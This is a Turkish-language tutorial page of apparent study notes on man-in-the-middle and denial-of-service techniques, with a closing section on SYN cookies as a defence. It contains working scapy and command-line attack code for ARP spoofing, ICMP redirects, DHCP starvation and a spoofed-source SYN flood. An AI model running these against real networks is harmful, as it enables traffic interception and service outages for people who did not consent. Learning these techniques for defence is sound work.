Ana içeriğe geç

MITM (Man In The Middle)

Bir ağ içerisindeki sistem kendi bağlantılarını başkası üzerinden geçiriyor ise arada kalan sistem akan trafiği inceleyebilir. Bunu yapmaktaki amaç arada akan trafiği incelemek veya farklı bir müdahalede bulunmak. Örnek olarak iki farklı yöntem vardır.

 • DHCP
 • ARP
 • Layer 3 (ICMP)
 • TCP

ARP

Warning

Bunu yapabilmek için Arp Adresleriyle oynamak daha kolay olduğu için DHCP serverini indirmek yerine ARP konusunda yaptığımız gibi mac adreslerini değiştirmeliyiz.

echo 1 > /proc/sys/net/ipv4/ip_forward # Routing Özelliğini Açar
arpspoof -c both -t 1.1.1.1 -r 2.2.2.2 # Router ve Hedef Sistemin Arp Tablosunu Zehirler

Veya scapy kullanmak istersek.

ethBaslik = Ether(dst="00:0c:29:fe:7b:ea",src="00:0c:29:14:3c:c9")
ARPBaslik = ARP(op=1, hwsrc="00:0c:29:fe:7b:ea",psrc="1.1.1.1",pdst="2.2.2.2")
sendp(ethBaslik/ARPBaslik)

ICMP

ICMP Redirect paketi kullanarak trafiğin akışı değiştirilebilir.

Kurban sisteme icmp redirect paketi kaynak olarak router gösterilerek router olarak kendi adresimizi gönderirsek eğer giden paketleri yakalayabiliriz. Buradaki sıkıntı paketin içinde source kısmı kurban sistem olduğu için router gelen paketi saldırgana göndermez. Gelen paketi yakalayabilmek için TCP paketi içerisindeki source kısmını kurban ip yerine saldırganın ip adresini yapılmalı ki router gelen cevabı saldırgana gönderebilsin.

#!/bin/python2.7
from scapy.all import *

originalRouterIP=''
attackerIP=''
victimIP=''
serverIP=''

# Here we create an ICMP Redirect packet
ip=IP()
ip.src=originalRouterIP
ip.dst=victimIP
icmpRedirect=ICMP()
icmpRedirect.type=5
icmpRedirect.code=1
icmpRedirect.gw=attackerIP

# The ICMP packet payload /should/ :) contain the original TCP SYN packet
# sent from the victimIP
redirPayloadIP=IP()
redirPayloadIP.src=victimIP
redirPayloadIP.dst=serverIP
fakeOriginalTCPSYN=TCP()
fakeOriginalTCPSYN.flags="S"
fakeOriginalTCPSYN.dport=80
fakeOriginalTCPSYN.seq=444444444
fakeOriginalTCPSYN.sport=55555

# Release the Kraken!
while True:
send(ip/icmpRedirect/redirPayloadIP/fakeOriginalTCPSYN)

Paket Kurbandan adresinden çıkarken kaynak kısmını değiştirmek için iptables kullanılabilir.

iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE

DHCP

DHCP servisini indirip kendi dhcp servisimizi başlatarak gateway adresini değiştirerek bunu başarabiliriz.

İlk olarak DHCP sunucusundaki havuzu doldurmak (DHCP-Starve)

$ scapy
for i in range(2,255):
  mac = str(RandMAC())
  dhcpServerID="192.168.255.51"
  eth = Ether(dst="ff:ff:ff:ff:ff:ff",src=mac)
  ip = IP(src="0.0.0.0",dst="255.255.255.255")
  ud = UDP(sport=68,dport=67)
  bootp = BOOTP(chaddr=mac)
  dhcp = DHCP(options = [ ("message-type","request"),("requested_addr","192.168.255."+str(i)),("server_id",dhcpServerID),"end"])
  sendp(eth/ip/ud/bootp/dhcp)

daha sonra bir dhcp sunucusunu ayağa kaldırıp broadcastte dhcp keşfi aryan makinalara ip adresini vererek trafiği inceleyebiliriz. DHCP server olarak dnsmasq örnek verilebilir.

TCP

TCP/Dos saldırısı TCP/SYN paketinin kaynak ip ve port bilgilerini değiştirerek gönderebilir. Servise yönelik yapılacağı zaman daha etkilidir.

Scapy kullanarak şu şekilde yapılabilir:

$ scapy
ip = IP(src=RandIP(),dst="0.0.0.0")
tcp = TCP(sport=RandShort(),dport=80,flags="S")
paket = ip/tcp
send(paket,loop=1)

mz adlı aracı kullanmak istersek:

mz -B >ip< -t tcp "sp=1-65535,dp=80,flags=syn" -c 0

SynCookie

Sunucu ilk açıldığında rastgele bir sayı üretilir ve bu X sayısı kaynak ip, kaynak port ve hedef port ile toplanır. Sunucuya gelen SYN+ACK requestinde gelende seq numarasını bir azaltıp geriye doğru kontrol eder. Bu sayede sunucudaki tablonun doldurulması engellenebilir.

---SYN--->
<--SYN-ACK- # sequenceNumarası = KaynakIP + KaynakPort + HedefPort + X
---ACK---> # Burda Client acknowledgeNumarasına sequenceNumarası+1 yazmalı

Yukarıdaki gibi bir 3 way handshake işleminde, Sunucu tarafında gelen acknowledge kısmını bir azaltıp adresleri kontrol ederek oturumun başarılı bir şekilde devam ettiğini daha az masrafla tablo kullanmadan anlayabilir.

Warning

Ubuntu Serverda bu özellik varsayılan olarak aktiftir.


Son Güncelleme: May 28, 2020